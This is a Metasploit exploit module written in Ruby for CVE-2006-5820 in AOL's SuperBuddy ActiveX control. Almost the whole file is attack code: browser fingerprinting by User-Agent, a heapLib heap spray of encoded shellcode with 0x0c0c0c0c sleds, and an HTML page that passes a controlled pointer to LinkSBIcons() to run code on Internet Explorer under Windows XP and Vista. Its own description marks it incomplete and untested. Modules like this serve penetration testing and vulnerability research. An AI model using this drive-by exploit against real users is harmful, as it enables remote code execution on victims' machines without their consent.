##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] American Online (AOL) SuperBuddy ActiveX LinkSBIcons() Remote Code Execution",
			'Description'    => %q{
				User-controlled pointer in LinkSBIcons() as as argument, enough said.
				This module has not been tested at all, because the vulnerable version of AOL
				hasn't been found.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'Cody Pierce',  #Initial discovery
					'sinn3r',       #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2006-5820' ],
					[ 'OSVDB', '34318' ],
					[ 'BID', '23224' ],
					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/23224.msf' ]
				],
			'Payload'        =>
				{
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "process",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Rop' => false,  'Offset' => '0x5F4' } ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => false,  'Offset' => '0x5F4' } ],
					#[ 'IE 8 on Windows XP SP3', { 'Rop' => true,   'Offset' => '0x5f4' } ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => false,  'Offset' => '0x5f4' } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 8 2006",
			'DefaultTarget'  => 0))
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP2/SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		#elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
		#	return targets[3]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[4]  #IE 7 on Windows Vista
		else
			return nil
		end
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
			send_not_found(cli)
			return
		end

		js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		# The heap spraying routine
		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{my_target['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();

		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}
		JS

		spray = heaplib(spray, {:noobfu => true})

		# 0c0c0c0c = 202116108
		html = <<-EOS
		<html>
		<head>
		<script>
		#{spray}
		</script>
		</head>
		<body>
		<object id="aol" classid="clsid:189504B8-50D1-4AA8-B4D6-95C8F58A6414" width="0" height="0"></object>
		<script>
		aol.LinkSBIcons(0x0c0c0c0c);
		</script>
		</body>
		</html>
		EOS

		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
end

=begin
C:\Program Files\AOL 9.0\sb.dll
new ActiveXObject("Sb.SuperBuddy.1")

The vulnerability is confirmed in AOL 9.0 Revision 4156.910. Other versions may also be affected.
Also, according to ZDI, the software is automatically patched when the user logs on to AOL

WAOL_0.4327.134.zip  <--- not vulnerable
WAOL_0.4156.910.zip  <--- vulnerable. But good luck finding this one.

https://secunia.com/advisories/24714/3/
http://www.securityfocus.com/archive/1/archive/1/464313/100/0/threaded
http://www.symantec.com/business/security_response/writeup.jsp?docid=2007-011917-1403-99
http://jsunpack.jeek.org/dec/go?report=38c888e7ad2030b21c5fd240b12c5b2a8dc8015e

http://dev.metasploit.com/redmine/issues/5459
=end
